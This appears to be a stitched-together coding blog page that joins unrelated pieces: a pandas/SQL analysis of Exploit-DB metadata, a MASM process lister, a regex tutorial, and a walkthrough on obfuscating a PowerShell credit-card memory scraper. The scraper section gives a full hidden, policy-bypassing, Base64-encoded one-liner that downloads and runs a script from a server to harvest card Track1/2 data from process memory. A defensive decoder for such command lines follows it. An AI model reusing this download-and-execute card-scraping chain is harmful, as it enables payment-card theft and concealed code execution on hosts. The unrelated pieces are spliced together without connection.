27 Kerio Personal Firewall 2.1.4 - Remote Code Ex... 2003-05-08
28 Firebird 1.0.2 FreeBSD 4.7-RELEASE - Local Roo... 2003-05-12
29 Snitz Forums 3.3.03 - Remote Command Execution... 2003-05-12
... ... ...
35465 WordPress Featured Comments Plugin Cross Site ... 2014-06-10
35466 Linux Kernel <= 3.3.5 '/drivers/media/media-de... 2014-05-28
35467 Konica Minolta FTP Utility 1.00 - CWD Command ... 2016-01-11
35468 KeePass Password Safe Classic 1.29 - Crash PoC 2016-01-11
35469 Amanda <= 3.3.1 - Local Root Exploit 2016-01-11
35470 TrendMicro node.js HTTP Server Listening on lo... 2016-01-11
35471 Adobe Flash BlurFilter Processing - Out-of-Bou... 2016-01-11
35472 Adobe Flash - Use-After-Free When Rendering Di... 2016-01-11
35473 Adobe Flash - Use-After-Free When Setting Stage 2016-01-11
35474 Foreman Smart-Proxy Remote Command Injection V... 2014-06-05
35475 ZeusCart 'prodid' Parameter SQL Injection Vuln... 2014-06-24
35476 FortiGate OS Version 4.x - 5.0.7 - SSH Backdoor 2016-01-12
35477 Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - Imag... 2016-01-12
35478 Linux Kernel overlayfs - Local Privilege Escal... 2016-01-12
35479 WhatsUp Gold 16.3 - Unauthenticated Remote Cod... 2016-01-13
35480 Microsoft Windows devenum.dll!DeviceMoniker::L... 2016-01-13
35481 Microsoft Office / COM Object DLL Planting wit... 2016-01-13
35482 SevOne NMS <= 5.3.6.0 - Remote Root Exploit 2016-01-14
35483 Manage Engine Applications Manager 12 - Multip... 2016-01-14
35484 Manage Engine Application Manager 12.5 - Arbit... 2016-01-14
35485 WordPress NextGEN Gallery <= 1.9.1 'photocrati... 2014-05-19
35486 AtomCMS SQL Injection and Arbitrary File Uploa... 2014-07-07
35487 xClassified 'ads.php' SQL Injection Vulnerability 2014-07-07
35488 WordPress BSK PDF Manager Plugin 'wp-admin/adm... 2014-07-09
35489 NetSchedScan 1.0 - Crash PoC 2016-01-15
35490 phpDolphin <= 2.0.5 - Multiple Vulnerabilities 2016-01-15
35491 Amanda <= 3.3.1 - amstar Command Injection Loc... 2016-01-15
35492 Roundcube 1.1.3 - Path Traversal Vulnerability 2016-01-15
35493 mcart.xls Bitrix Module 6.5.2 - SQL Injection ... 2016-01-15
35494 WordPress BSK PDF Manager Plugin 'wp-admin/adm... 2014-07-09

author platform type port
0 kralor windows remote 80
1 RoMaNSoFt windows remote 80
2 Wojciech Purczynski linux local 0
3 Andi solaris local 0
4 Marcin Wolak windows remote 139
5 rgod php webapps 0
6 H D Moore linux remote 139
7 zillion linux remote 0
8 Matthew Murphy windows dos 0
9 eSDee linux remote 139
10 Garage4Hackers windows dos 0
11 Daniel Nystram linux dos 0
12 KuRaK linux local 0
13 Luca Ercoli windows dos 0
14 Neeko Oni osx local 0
15 einstein linux remote 1723
16 Tom Ferris windows dos 0
17 truff linux remote 0
18 blightninjas linux remote 1723
19 Haamed Gheibi windows remote 139
20 Xpl017Elz linux local 0
21 aT4r windows dos 0
22 Johnny Cyberpunk windows remote 554
23 bysin linux remote 25
24 Maurizio Agazzini linux remote 0
25 Nicolas Couture linux remote 0
26 Yaroslav Polyakov linux remote 80
27 Burebista windows remote 0
28 bob bsd local 0
29 None windows remote 0
... ... ... ... ...
35465 Tom Adams php webapps 0
35466 Salva Peiro linux local 0
35467 TOMIWA windows remote 21
35468 Mohammad Reza Espargham windows dos 0
35469 Hacker Fantastic linux local 0
35470 Google Security Research windows remote 0
35471 Google Security Research multiple dos 0
35472 Google Security Research windows dos 0
35473 Google Security Research win64 dos 0
35474 Lukas Zapletal multiple remote 0
35475 Kenny Mathis php webapps 0
35476 operator8203 hardware remote 22
35477 Stelios Tsampas linux dos 0
35478 halfdog linux local 0
35479 Matt Buzanowski asp webapps 0
35480 Google Security Research windows dos 0
35481 Google Security Research windows dos 0
35482 @iamsecurity php webapps 80
35483 Bikramaditya Guha multiple webapps 9090
35484 Bikramaditya Guha multiple webapps 0
35485 SANTHO php webapps 0
35486 Jagriti Sahu php webapps 0
35487 Lazmania61 php webapps 0
35488 Claudio Viviani php webapps 0
35489 Abraham Espinosa windows dos 0
35490 WhiteCollarGroup php webapps 80
35491 Hacker Fantastic linux local 0
35492 High-Tech Bridge SA php webapps 80
35493 High-Tech Bridge SA php webapps 80
35494 Claudio Viviani php webapps 0

[35495 rows x 9 columns]
In [18]:
# bare alias in ORDER BY: a quoted 'num_remote' is a string constant and sorts nothing
df = pd.read_sql_query("SELECT platform, COUNT(*) AS num_remote FROM data WHERE type LIKE '%remote%' GROUP BY platform ORDER BY num_remote", disk_engine)
py.iplot([Bar(x=df.platform, y=df.num_remote)], filename='Number of remote exploits by platform')
In [20]:
df = pd.read_sql_query("SELECT platform, COUNT(*) AS num_webapps FROM data WHERE type LIKE '%webapps%' GROUP BY platform ORDER BY num_webapps", disk_engine)
py.iplot([Bar(x=df.platform, y=df.num_webapps)], filename='Number of webapps exploits by platform')
In [21]:
df = pd.read_sql_query("SELECT platform, COUNT(*) AS num_local FROM data WHERE type LIKE '%local%' GROUP BY platform ORDER BY num_local", disk_engine)
py.iplot([Bar(x=df.platform, y=df.num_local)], filename='Number of local exploits by platform')
In [22]:
df = pd.read_sql_query("SELECT platform, COUNT(*) AS num_dos FROM data WHERE type LIKE '%dos%' GROUP BY platform ORDER BY num_dos", disk_engine)
py.iplot([Bar(x=df.platform, y=df.num_dos)], filename='Number of dos exploits by platform')
In [24]:
df = pd.read_sql_query("SELECT platform, COUNT(*) AS num_exploits FROM data GROUP BY platform ORDER BY num_exploits", disk_engine)
py.iplot([Bar(x=df.platform, y=df.num_exploits)], filename='Number of exploits by platform')
In [35]:
df = pd.read_sql_query("SELECT platform, COUNT(*) as 'num_exploits' FROM data GROUP BY platform ORDER BY 'num_exploits'", disk_engine)
In [36]:
print df
          platform  num_exploits
0 aix 84
1 android 46
2 arm 15
3 asp 1508
4 atheos 1
5 beos 4
6 bsd 89
7 bsd_ppc 1
8 bsd_x86 14
9 bsdi_x86 3
10 cfm 56
11 cgi 692
12 freebsd 80
13 freebsd_x86 19
14 freebsd_x86-64 2
15 generator 9
16 hardware 1103
17 hp-ux 43
18 immunix 2
19 ios 135
20 irix 60
21 java 117
22 jsp 216
23 lin_amd64 9
24 lin_x86 230
25 lin_x86-64 28
26 linux 2352
27 linux_mips 9
28 linux_ppc 4
29 linux_sparc 2
.. ... ...
31 mips 2
32 multiple 1949
33 netbsd_x86 10
34 netware 16
35 novell 39
36 openbsd 18
37 openbsd_x86 3
38 osx 273
39 osx_ppc 11
40 palm_os 5
41 perl 3
42 php 17590
43 plan9 1
44 python 4
45 qnx 10
46 sco 38
47 sco_x86 1
48 sh4 3
49 solaris 190
50 solaris_sparc 11
51 solaris_x86 10
52 system_z 1
53 tru64 6
54 ultrix 2
55 unix 304
56 unixware 4
57 win32 102
58 win64 16
59 windows 7921
60 xml 17

[61 rows x 2 columns]
In [16]:
df = pd.read_sql_query("SELECT file, COUNT(*) as 'num_windows' FROM data WHERE file LIKE '%windows%' GROUP BY file ORDER BY 'num_windows'", disk_engine)
In [17]:
print df
                                      file  num_windows
0 platforms/windows/dos/1000.cpp 5
1 platforms/windows/dos/10005.py 5
2 platforms/windows/dos/10062.py 5
3 platforms/windows/dos/10068.rb 5
4 platforms/windows/dos/10073.py 5
5 platforms/windows/dos/10091.txt 5
6 platforms/windows/dos/10092.txt 5
7 platforms/windows/dos/10100.py 5
8 platforms/windows/dos/10102.pl 5
9 platforms/windows/dos/10103.txt 5
10 platforms/windows/dos/10104.py 5
11 platforms/windows/dos/10106.c 5
12 platforms/windows/dos/10160.py 5
13 platforms/windows/dos/10163.pl 5
14 platforms/windows/dos/10164.c 5
15 platforms/windows/dos/10171.py 5
16 platforms/windows/dos/10176.txt 5
17 platforms/windows/dos/10190.txt 5
18 platforms/windows/dos/10204.txt 5
19 platforms/windows/dos/10208.txt 5
20 platforms/windows/dos/10210.txt 5
21 platforms/windows/dos/10221.txt 5
22 platforms/windows/dos/10223.txt 5
23 platforms/windows/dos/1024.html 5
24 platforms/windows/dos/1025.html 5
25 platforms/windows/dos/10257.py 5
26 platforms/windows/dos/1027.c 5
27 platforms/windows/dos/10303.py 5
28 platforms/windows/dos/10333.py 5
29 platforms/windows/dos/10343.txt 5
... ... ...
7891 platforms/windows/webapps/31994.txt 5
7892 platforms/windows/webapps/31995.txt 5
7893 platforms/windows/webapps/33330.txt 5
7894 platforms/windows/webapps/33428.py 5
7895 platforms/windows/webapps/33434.rb 5
7896 platforms/windows/webapps/33633.txt 5
7897 platforms/windows/webapps/34527.c 5
7898 platforms/windows/webapps/34817.rb 5
7899 platforms/windows/webapps/34852.txt 5
7900 platforms/windows/webapps/34924.txt 5
7901 platforms/windows/webapps/35039.rb 5
7902 platforms/windows/webapps/35529.txt 5
7903 platforms/windows/webapps/35593.txt 5
7904 platforms/windows/webapps/35982.txt 5
7905 platforms/windows/webapps/36262.txt 5
7906 platforms/windows/webapps/36580.rb 5
7907 platforms/windows/webapps/36861.txt 5
7908 platforms/windows/webapps/36960.txt 5
7909 platforms/windows/webapps/37059.html 5
7910 platforms/windows/webapps/37319.html 5
7911 platforms/windows/webapps/37320.html 5
7912 platforms/windows/webapps/37395.txt 5
7913 platforms/windows/webapps/37621.txt 5
7914 platforms/windows/webapps/38379.txt 5
7915 platforms/windows/webapps/38380.txt 5
7916 platforms/windows/webapps/38602.txt 5
7917 platforms/windows/webapps/38762.txt 5
7918 platforms/windows/webapps/38822.rb 5
7919 platforms/windows/webapps/9873.txt 5
7920 platforms/windows/webapps/9885.txt 5

[7921 rows x 2 columns]
In [38]:
df = pd.read_sql_query("SELECT date, COUNT(*) AS num_exploit FROM data GROUP BY date ORDER BY num_exploit", disk_engine)
py.iplot([Bar(x=df.date, y=df.num_exploit)], filename='Number of exploits by date')
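The grouped counts from the notebook, redone with the standard-library sqlite3 module as an added example (not a cell from the author's notebook). It reuses rows from the output above trimmed to six columns, and it also reproduces the notebook's ORDER BY 'num_exploits': a single-quoted alias is a string constant in SQLite, so those cells order by nothing and the printed table above comes back in GROUP BY (alphabetical) order rather than by count. The function names are mine; the type filter is passed as a bound parameter rather than spliced into the SQL.

```python
import sqlite3

# Rows copied from the notebook output above, trimmed to six columns
# (id, file, date, platform, type, port); description and author are omitted.
SAMPLE_ROWS = [
    (1, "platforms/windows/remote/1.c", "2003-03-23", "windows", "remote", 80),
    (2, "platforms/windows/remote/2.c", "2003-03-24", "windows", "remote", 80),
    (3, "platforms/linux/local/3.c", "2003-03-30", "linux", "local", 0),
    (6, "platforms/php/webapps/6.php", "2006-05-25", "php", "webapps", 0),
    (9, "platforms/windows/dos/9.c", "2003-04-09", "windows", "dos", 0),
    (11, "platforms/linux/dos/11.c", "2003-04-11", "linux", "dos", 0),
    (39213, "platforms/php/webapps/39213.txt", "2014-06-10", "php", "webapps", 0),
    (39231, "platforms/asp/webapps/39231.py", "2016-01-12", "asp", "webapps", 0),
    (39234, "platforms/php/webapps/39234.py", "2016-01-12", "php", "webapps", 0),
    (39237, "platforms/php/webapps/39237.txt", "2016-01-12", "php", "webapps", 0),
    (39240, "platforms/php/webapps/39240.txt", "2016-01-12", "php", "webapps", 0),
]


def build_db():
    """In-memory SQLite table with the same column names the notebook's to_sql produced."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE data (id INTEGER PRIMARY KEY, file TEXT, date TEXT, "
        "platform TEXT, type TEXT, port INTEGER)"
    )
    conn.executemany("INSERT INTO data VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def count_by_platform(conn, exploit_type=None, quoted_alias=False):
    """Exploit count per platform, optionally restricted to one type.

    quoted_alias=True mirrors the notebook's ORDER BY 'num_exploits': the quoted
    name is a string literal, so SQLite has nothing to sort on and the rows come
    back in GROUP BY order. The default orders by the bare alias, highest first.
    """
    order = "'num'" if quoted_alias else "num DESC, platform"
    sql = "SELECT platform, COUNT(*) AS num FROM data"
    params = ()
    if exploit_type is not None:
        sql += " WHERE type = ?"          # bound parameter, never string-formatted input
        params = (exploit_type,)
    sql += " GROUP BY platform ORDER BY " + order
    return conn.execute(sql, params).fetchall()


def count_by_year(conn):
    """The 'exploits by date' graph, bucketed by year instead of by individual day."""
    return conn.execute(
        "SELECT substr(date, 1, 4) AS year, COUNT(*) AS num FROM data "
        "GROUP BY year ORDER BY year"
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("by platform (sorted):  ", count_by_platform(db))
    print("by platform (quoted):  ", count_by_platform(db, quoted_alias=True))
    print("webapps only:          ", count_by_platform(db, "webapps"))
    print("by year:               ", count_by_year(db))
```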

Let’s Code: WIN32 MASM Process List Program

ShowProcess PROTO pid:DWORD
 
Core Functions
I. mov pbuf, ptr$(buffer)                          ; cast buffer address to a pointer

    invoke EnumProcesses,pbuf,4096,ADDR breq        ; enumerate processes
    shr breq, 2                                     ; get process count

II. invoke ShowProcess,[esi]

III.  mov hProcess, rv(OpenProcess,PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,FALSE,pid)
 .if hProcess != 0
      .if rv(EnumProcessModules,hProcess,ADDR hMod,4,ADDR cbNeeded) != 0
        invoke GetModuleBaseName,hProcess,hMod,pbuf,260
        mov ptxt, cat$(ptxt,"pid ",str$(pid)," ",pbuf)
      .else
        mov ptxt, cat$(ptxt,"pid ",str$(pid)," -fail- EnumProcessModules")
      .endif
    .else
      mov ptxt, cat$(ptxt,"pid ",str$(pid)," -fail- OpenProcess")
    .endif

Core Library
include \masm32\include\psapi.inc
includelib \masm32\lib\psapi.lib


; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
    include \masm32\include\masm32rt.inc
; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

comment * —————————————————–
                        List of All Processes and Its PIDs
        —————————————————– *

    include \masm32\include\psapi.inc
    includelib \masm32\lib\psapi.lib

    ShowProcess PROTO pid:DWORD

    .code

start:
 
; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

    call main
    inkey
    exit

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

main proc

    LOCAL breq  :DWORD
    LOCAL pbuf  :DWORD
    LOCAL buffer[4096]:BYTE

    push esi
    push edi

    mov pbuf, ptr$(buffer)                          ; cast buffer address to a pointer

    invoke EnumProcesses,pbuf,4096,ADDR breq        ; enumerate processes
    shr breq, 2                                     ; get process count

    mov esi, pbuf
    mov edi, breq

  @@:
    invoke ShowProcess,[esi]
    add esi, 4
    sub edi, 1
    jnz @B

    pop edi
    pop esi

    ret

main endp

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

ShowProcess proc pid:DWORD

    LOCAL hProcess  :DWORD
    LOCAL hMod      :DWORD
    LOCAL cbNeeded  :DWORD
    LOCAL pbuf      :DWORD
    LOCAL ptxt      :DWORD
    LOCAL buf[260]  :BYTE
    LOCAL txt[260]  :BYTE

    mov pbuf, ptr$(buf)
    mov ptxt, ptr$(txt)

    mov hProcess, rv(OpenProcess,PROCESS_QUERY_INFORMATION or PROCESS_VM_READ,FALSE,pid)
                         
    .if hProcess != 0
      .if rv(EnumProcessModules,hProcess,ADDR hMod,4,ADDR cbNeeded) != 0
        invoke GetModuleBaseName,hProcess,hMod,pbuf,260
        mov ptxt, cat$(ptxt,"pid ",str$(pid)," ",pbuf)
      .else
        mov ptxt, cat$(ptxt,"pid ",str$(pid)," -fail- EnumProcessModules")
      .endif
    .else
      mov ptxt, cat$(ptxt,"pid ",str$(pid)," -fail- OpenProcess")
    .endif

    print ptxt,13,10

    invoke CloseHandle,hProcess

    ret

ShowProcess endp

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

end start

Obfuscated PowerShell Memory Scraping for Credit Cards

Original Source & Inspiration: http://www.shellntel.com/blog/2015/9/16/powershell-cc-memory-scraper

* Non-resident credit card memory scraper, now improved the obfuscation technique using -EncodedCommand
* One-liner PowerShell script/downloader essentially does its dirty work without any additional malware corpus on the host
* Great for penetration tests of various merchants or for PCI-DSS audit compliance

  • (1) Set up a server with the Memory Scraper download
  • (2) Encode the PowerShell memory scraper using -EncodedCommand (Base64)
  • (3) Allow execution of scripts on the host via powershell.exe Set-ExecutionPolicy Unrestricted
  • (4) Execute the obfuscated script on the host that downloads the memory scraper and parses the memory of the notepad.exe process for credit card Track1/2 data with the Luhn algorithm


  • powershell.exe -exec bypass -NoP -NonI -W Hidden -Enc "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADkAMwA6ADgAMAAwADAALwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACwAJwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACkAOwAuAC8AbQBlAG0AXwBzAGMAcgBhAHAAZQByAC4AcABzADEAIAAtAFAAcgBvAGMAIABuAG8AdABlAHAAYQBkADsA"
Picture

(1) On the server, set up a lightweight HTTP server

  • copy the scraper script into a directory and run python -m SimpleHTTPServer from it

(2) Encode the PowerShell memory scraper using -EncodedCommand (Base64):

The following PowerShell is going to be encoded using -EncodedCommand instead of -Command:

  • powershell.exe -exec bypass -Command "(New-Object Net.WebClient).DownloadFile('http://192.168.0.193:8000/mem_scraper.ps1','mem_scraper.ps1');./mem_scraper.ps1 -Proc notepad;"

Reference: https://blogs.msdn.microsoft.com/timid/2014/03/26/powershell-encodedcommand-and-round-trips/

  • -EncodedCommand: accepts a base-64-encoded string version of a command. Use this parameter to submit commands to Windows PowerShell that require complex quotation marks or curly braces.

# To use the -EncodedCommand parameter:
    $command = "(New-Object Net.WebClient).DownloadFile('http://192.168.0.193:8000/mem_scraper.ps1','mem_scraper.ps1');./mem_scraper.ps1 -Proc notepad;"
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)   # PowerShell expects UTF-16LE, not ASCII/UTF-8
    $encodedCommand = [Convert]::ToBase64String($bytes)   # Base64-encoded command: KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADkAMwA6ADgAMAAwADAALwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACwAJwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACkAOwAuAC8AbQBlAG0AXwBzAGMAcgBhAHAAZQByAC4AcABzADEAIAAtAFAAcgBvAGMAIABuAG8AdABlAHAAYQBkADsA
    powershell.exe -encodedCommand $encodedCommand   # Test

Here is the reverse process (decoding the Base64 string back to the command):
    $base64 = $encodedCommand   # the Base64 string produced above
    $decodedCommand = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64))
    $decodedCommand   # (New-Object Net.WebClient).DownloadFile('http://192.168.0.193:8000/mem_scraper.ps1','mem_scraper.ps1');./mem_scraper.ps1 -Proc notepad;

The final obfuscated PowerShell one-liner is as follows:

  • powershell.exe -exec bypass -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADkAMwA6ADgAMAAwADAALwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACwAJwBtAGUAbQBfAHMAYwByAGEAcABlAHIALgBwAHMAMQAnACkAOwAuAC8AbQBlAG0AXwBzAGMAcgBhAHAAZQByAC4AcABzADEAIAAtAFAAcgBvAGMAIABuAG8AdABlAHAAYQBkADsA"

(3) Allow execution of scripts on the host via powershell.exe Set-ExecutionPolicy Unrestricted
The Set-ExecutionPolicy cmdlet enables you to determine which Windows PowerShell scripts (if any) will be allowed to run on your computer. Windows PowerShell has four different execution policies:

  • Restricted – No scripts can be run. Windows PowerShell can be used only in interactive mode.
  • AllSigned – Only scripts signed by a trusted publisher can be run.
  • RemoteSigned – Downloaded scripts must be signed by a trusted publisher before they can be run.
  • Unrestricted – No restrictions; all Windows PowerShell scripts can be run.

Reference: https://technet.microsoft.com/en-us/library/ee176961.aspx

(4) Execute the obfuscated script on the host; it downloads the memory scraper and parses the process memory of notepad.exe for credit card Track1/2 data, validating candidates with the Luhn algorithm
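The same encoding seen from the defender's side, as an added example that is not part of the original post or the shellntel script: it recovers the plaintext behind an -EncodedCommand argument in a process-creation command line (UTF-16LE under Base64, padding restored if a log dropped it) and lists the reasons to alert on it. The command lines and the host example.invalid are constructed.

```python
import base64
import re
import shlex

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (the post uses -Enc);
# -exec / -ExecutionPolicy must not be mistaken for it.
ENC_FLAG = re.compile(r"^[-/](e|ec|en|enc|encoded|encodedc|encodedcommand)$", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
# Download-and-execute markers; the post's decoded one-liner carries the first two.
MARKERS = ("Net.WebClient", "DownloadFile", "DownloadString", "Invoke-Expression", "IEX")

def encode_command(command):
    """Forward step from the post: UTF-16LE bytes, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Plaintext behind -EncodedCommand, or None when absent or undecodable."""
    try:
        tokens = shlex.split(cmdline, posix=False)   # Windows quoting, keep backslashes
    except ValueError:                               # unbalanced quotes in the log line
        tokens = cmdline.split()
    for flag, blob in zip(tokens, tokens[1:]):
        if ENC_FLAG.match(flag):
            blob = blob.strip("\"'")
            blob += "=" * (-len(blob) % 4)           # restore padding a log may have dropped
            try:
                return base64.b64decode(blob).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def indicators(cmdline):
    """Reasons to alert on one process-creation command line."""
    found = []
    if HIDDEN.search(cmdline):
        found.append("hidden window")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        found.append("encoded command")
        found.extend(m for m in MARKERS if m.lower() in decoded.lower())
    return found

# Constructed sample lines (not real telemetry); example.invalid is a placeholder host.
SAMPLE_PAYLOAD = "(New-Object Net.WebClient).DownloadFile('http://example.invalid/s.ps1','s.ps1');./s.ps1"
SAMPLE_LINES = [
    'powershell.exe -exec bypass -NoP -NonI -W Hidden -Enc "%s"' % encode_command(SAMPLE_PAYLOAD),
    "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(indicators(line), "<-", line[:60])
```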



Let’s Code: Regular Expressions

Source: http://code.tutsplus.com/tutorials/8-regular-expressions-you-should-know--net-6149

1. Matching a Username
Pattern: /^[a-z0-9_-]{3,16}$/

A. String that matches: my-us3r_n4m3
B. String that doesn’t match: th1s1s-wayt00_l0ngt0beausername (too long)

2. Matching a Password 
Pattern: /^[a-z0-9_-]{6,18}$/

A. String that matches: myp4ssw0rd
B. String that doesn’t match: mypa$$w0rd (contains a dollar sign)

3. Matching a Hex Value
Pattern: /^#?([a-f0-9]{6}|[a-f0-9]{3})$/

A. String that matches: #a3c113
B. String that doesn't match: #4d82h4 (contains the letter h)

4. Matching a Slug
Pattern: /^[a-z0-9-]+$/

A. String that matches: my-title-here
B. String that doesn't match: my_title_here (contains underscores)

5. Matching an Email
Pattern: /^([a-z0-9_\.-]+)@([\da-z\.-]+)\.([a-z\.]{2,6})$/

A. String that matches: john@doe.com
B. String that doesn't match: john@doe.something (TLD is too long)

6. Matching a URL
Pattern: /^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$/

A. String that matches: http://net.tutsplus.com/about
B. String that doesn't match: http://google.com/some/file!.html (contains an exclamation point)

7. Matching an IP Address
Pattern: /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/


8. Matching an HTML Tag
Pattern: /^<([a-z]+)([^<]+)*(?:>(.*)<\/\1>|\s+\/>)$/

A. String that matches: <a href="http://net.tutsplus.com/">Nettuts+</a>
B. String that doesn't match: <img src="img.jpg" alt="My image>" /> (attributes can't contain greater than signs)
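As an added example (not from the post or the tutsplus source), the eight patterns ported to Python and run as validators over the post's A/B strings plus constructed cases: IP addresses, which the post lists no strings for, and a closing-tag mismatch that exercises the \1 backreference. It also shows why a validator must use re.fullmatch rather than re.match, since $ alone accepts a trailing newline.

```python
import re

# The post's eight patterns, ported from JavaScript /.../ literals to Python.
# Nested quantifiers such as ([\/\w \.-]*)* and ([^<]+)* backtrack exponentially
# on long non-matching input; keep them away from unbounded untrusted input.
PATTERNS = {
    "username": r"^[a-z0-9_-]{3,16}$",
    "password": r"^[a-z0-9_-]{6,18}$",
    "hex":      r"^#?([a-f0-9]{6}|[a-f0-9]{3})$",
    "slug":     r"^[a-z0-9-]+$",
    "email":    r"^([a-z0-9_\.-]+)@([\da-z\.-]+)\.([a-z\.]{2,6})$",
    "url":      r"^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$",
    "ip":       r"^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}"
                r"(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$",
    "html_tag": r"^<([a-z]+)([^<]+)*(?:>(.*)<\/\1>|\s+\/>)$",
}
COMPILED = {name: re.compile(pat) for name, pat in PATTERNS.items()}

def matches(name, value):
    """True when the whole value matches the named pattern (fullmatch, not match)."""
    return COMPILED[name].fullmatch(value) is not None

def trailing_newline_trap(name, value):
    """(re.match result, re.fullmatch result) for value with "\\n" appended:
    `$` matches before a trailing newline, so re.match lets "user\\n" through."""
    pat = COMPILED[name]
    return (pat.match(value + "\n") is not None, pat.fullmatch(value + "\n") is not None)

# Constructed check strings: the post's own A/B examples plus the extra cases.
CASES = [
    ("username", "my-us3r_n4m3", True), ("username", "th1s1s-wayt00_l0ngt0beausername", False),
    ("password", "myp4ssw0rd", True),   ("password", "mypa$$w0rd", False),
    ("hex", "#a3c113", True),           ("hex", "#4d82h4", False),
    ("slug", "my-title-here", True),    ("slug", "my_title_here", False),
    ("email", "john@doe.com", True),    ("email", "john@doe.something", False),
    ("url", "http://net.tutsplus.com/about", True),
    ("url", "http://google.com/some/file!.html", False),
    ("ip", "192.168.0.193", True),      ("ip", "256.1.1.1", False),
    ("html_tag", '<a href="http://net.tutsplus.com/">Nettuts+</a>', True),
    ("html_tag", '<a href="x">text</b>', False),   # \1 requires the same tag name
    # The post says this one fails, but [^<] admits ">", so the pattern accepts it;
    # use [^<>] for the attribute class if ">" inside attributes must be rejected.
    ("html_tag", '<img src="img.jpg" alt="My image>" />', True),
]

def run_cases(cases=CASES):
    """Return the (name, value) pairs whose result differs from the expected one."""
    return [(n, v) for n, v, expected in cases if matches(n, v) != expected]

if __name__ == "__main__":
    print("mismatches:", run_cases())
    print("re.match vs re.fullmatch on 'user\\n':", trailing_newline_trap("username", "user"))
```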